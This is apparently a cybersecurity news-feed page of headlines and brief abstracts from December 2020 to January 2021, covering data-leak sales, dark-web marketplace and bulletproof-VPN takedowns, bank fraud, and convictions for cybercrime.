Abstract Someone has set up a website named SolarLeaks where they are offering to sell gigabytes of files allegedly obtained as a result of the recently disclosed SolarWinds breach.

Security Week


January 13, 2021

World’s largest dark-web marketplace shuttered after Euro cybercops cuff Aussie Full Text

Abstract Europol cops have taken down dark-web souk DarkMarket, after arresting an Australian citizen living in Germany who they claim was operating the world's biggest online bazaar of its kind.

The Register


January 13, 2021

Top Penetration Testing Toolkits Abused by Cybercriminals Full Text

Abstract A security firm tracked tens of thousands of malware C&C servers used across over 80 malware families; more than a quarter of all the servers used Cobalt Strike and Metasploit.

Cyware Alerts - Hacker News


January 12, 2021

SolarLeaks site claims to sell data stolen in SolarWinds attacks Full Text

Abstract A website named 'SolarLeaks' is selling data they claim was stolen from companies confirmed to have been breached in the SolarWinds attack.

BleepingComputer


January 08, 2021

Laptop stolen from Pelosi’s office during Capitol riots Full Text

Abstract An aide for Speaker Nancy Pelosi (D-Calif.) said Friday that a laptop was stolen from the Speaker's office during the riots in the Capitol earlier this week, adding to existing security concerns. 

The Hill


January 07, 2021

SEO scammer extorts site owners using porn backlinks threat Full Text

Abstract Website owners are receiving emails threatening to ruin their reputation if they do not post a five-star review for a cryptocurrency exchange.

BleepingComputer


January 5, 2021

NCA Arrested 21 Customers who Advertised Stolen Personal Credentials Full Text

Abstract Britain's National Crime Agency announced that 21 individuals have been arrested across the UK on suspicion of purchasing personally identifiable information from the WeLeakInfo...

Cyber Security News


January 4, 2021

Greedy Cybercriminals Stealthily Abuse GitHub Service to Host Malware Full Text

Abstract In a recent report, Octoverse revealed that almost a fifth (around 17%) of all software bugs in GitHub were intentionally placed as backdoors by cybercriminals.

Cyware Alerts - Hacker News


January 3, 2021

Over 200 million records of Chinese Citizens for Sale on the Darkweb Full Text

Abstract During routine dark web monitoring, the research team at Cyble found threat actors selling 200 million+ records of Chinese citizens. During routine dark web monitoring, the research team at Cyble found multiple posts where threat actors are offering...

Security Affairs


December 31, 2020

Threat actor is selling 368.8 million records from 26 data breaches Full Text

Abstract A data breach broker is selling user records allegedly from twenty-six data breaches on a hacker forum. Security experts from Bleeping Computer reported that a threat actor is selling user records allegedly stolen from twenty-six companies on a hacker...

Security Affairs


December 31, 2020

Data breach broker selling user records stolen from 26 companies Full Text

Abstract A data breach broker is selling the allegedly stolen user records for twenty-six companies on a hacker forum, BleepingComputer has learned.

BleepingComputer


December 31, 2020

Cybercriminals Claim to Leak Door Controls USA’s 140GB Database on Hacker Forum Full Text

Abstract The archive was leaked on November 27-28. It appears to have been posted on the hacker forum after Door Controls USA seemingly refused to pay ransom to attackers who breached the company’s network.

CyberNews


December 28, 2020

Threat actor is selling a dump allegedly including 2.5M customers of service provider Ho Mobile Full Text

Abstract A threat intelligence analyst discovered a threat actor that is selling a database of the Italian mobile service provider Ho Mobile. Threat intelligence analyst @Bank_Security first spotted on a popular hacking forum a threat actor that is selling...

Security Affairs


December 28, 2020

UK NCA visits WeLeakInfo users to warn of using stolen data Full Text

Abstract 21 WeLeakInfo customers have been arrested across the UK for using stolen credentials downloaded from WeLeakInfo following an operation coordinated by the UK National Crime Agency (NCA).

BleepingComputer


December 24, 2020

‘UltraRank’ JavaScript-Sniffer Attack Campaign Hits Dozen E-Commerce Sites Full Text

Abstract A cybercriminal gang known as "UltraRank" has launched a new campaign, targeting at least a dozen e-commerce sites to steal payment card data using a JavaScript sniffer, says security firm Group-IB.

Info Risk Today


December 24, 2020

Bulletproof VPN Seized by Global Police Operation for Providing Services to CyberCriminals Full Text

Abstract United States law enforcement joins international partners to disrupt a VPN service used to facilitate criminal activity. Safe-Inet, a virtual private...

Cyber Security News


December 22, 2020

Thousands of Emulated Mobile Devices Used to Steal Millions of Dollars Full Text

Abstract IBM Trusteer researchers laid bare an automated mobile fraud operation that initiated illicit transactions and stole millions from the bank accounts of thousands of customers.

Cyware Alerts - Hacker News


December 22, 2020

Police Seize VPN Service Beloved by Cyber-criminals Full Text

Abstract German police lead operation to shut down Safe-Inet service and seize its infrastructure

Infosecurity Magazine


December 22, 2020

Cybercriminals’ Favorite Bulletproof VPN Service Shuts Down In Global Action Full Text

Abstract Law enforcement agencies from the US, Germany, Netherlands, Switzerland, France, along with Europol's European Cybercrime Centre (EC3), announced today the coordinated takedown of Safe-Inet, a popular virtual private network (VPN) service that was used to facilitate criminal activity. The three domains in question — insorg[.]org, safe-inet[.]com, and safe-inet[.]net — were shut down, and their infrastructure seized as part of a joint investigation called "Operation Nova." Europol called Safe-Inet a cybercriminals' "favorite." A crucial reason for the domains' seizure has been their central role in facilitating ransomware, carrying out web-skimming, spear-phishing, and account takeover attacks. The service, which comes with support for Russian and English languages and has been active for over a decade, offered "bulletproof hosting services" to website visitors, often at a high price to the criminal underworld. As of

The Hacker News


December 22, 2020

Bulletproof VPN services taken down in a global police operation Full Text

Abstract A joint operation conducted by European law enforcement agencies resulted in the seizure of the infrastructure of three bulletproof VPN services. A joint operation conducted by law enforcement agencies from the US, Germany, France, Switzerland, and the Netherlands...

Security Affairs


December 20, 2020

A massive fraud operation used mobile device emulators to steal millions from online bank accounts Full Text

Abstract Experts uncovered a massive fraud operation that used a network of mobile device emulators to steal millions of dollars from online bank accounts. Researchers from IBM Trusteer have uncovered a massive fraud operation that leveraged a network of mobile...

Security Affairs


December 19, 2020

FBI and Interpol shut down some servers of Joker’s Stash carding marketplace Full Text

Abstract Joker's Stash, the largest carding marketplace online, was shut down by a coordinated operation conducted by the FBI and Interpol. Joker's Stash, the largest carding marketplace online, was shut down as a result of a coordinated operation conducted...

Security Affairs


December 18, 2020

A ‘coordinated police’ action against the Joker’s Stash took a small domain offline Full Text

Abstract An ongoing law enforcement operation has disrupted aspects of a leading website where internet scammers frequently buy and sell stolen data, according to the site’s administrators.

Cyberscoop


December 17, 2020

Healthcare.gov Data Thief Jailed Full Text

Abstract Prison for tech company employee who stole PII and used it for financial gain

Infosecurity Magazine


December 16, 2020

Emulated mobile devices used to steal millions from US, EU banks Full Text

Abstract Threat actors behind an ongoing worldwide mobile banking fraud campaign were able to steal millions from multiple US and EU banks, needing just a few days for each attack.

BleepingComputer


December 16, 2020

Massive Fraud Operation Used Mobile Emulator Farms to Steal Millions of Dollars Full Text

Abstract The scale of this fraud operation is one that has never been seen before; in some cases, over 20 emulators were used in the spoofing of well over 16,000 compromised devices.

Security Intelligence


December 15, 2020

Ohio Couple Sold Secrets to China Full Text

Abstract Husband of researcher who sold hospital’s secrets to China admits his part in conspiracy

Infosecurity Magazine


December 15, 2020

#BSEC: Staying Alert to the Growing Dangers of Cybercrime Full Text

Abstract Cybercrime is becoming easier to conduct and successful attacks more consequential

Infosecurity Magazine


December 15, 2020

Former Cisco Engineer Gets Two Years for $2.4M Insider Attack Full Text

Abstract Sudhish Kasaba Ramesh, 31, of San Jose, pleaded guilty back in August to one count of intentionally accessing a protected computer without authorization and recklessly causing damage to Cisco.

Infosecurity Magazine


December 14, 2020

Sipulimarket Dark Web Marketplace Seized by Finnish Customs Full Text

Abstract Finnish Customs (Tulli) closed the Sipulimarket dark web marketplace on Friday and seized all its content. This recent hit...

Cyber Security News


December 11, 2020

Ex-Cisco engineer who nuked 16k WebEx accounts goes to prison Full Text

Abstract Sudhish Kasaba Ramesh, a former Cisco engineer, was sentenced on Wednesday to two years in prison and ordered to pay a $15,000 fine for shutting down more than 16,000 WebEx Teams accounts and over 450 virtual machines in 2018.

BleepingComputer


December 10, 2020

Teen who shook the Internet in 2016 pleads guilty to DDoS attacks Full Text

Abstract One of the operators behind a Mirai botnet pleaded guilty to their involvement in a huge DDoS attack that caused a massive Internet disruption during October 2016.

BleepingComputer

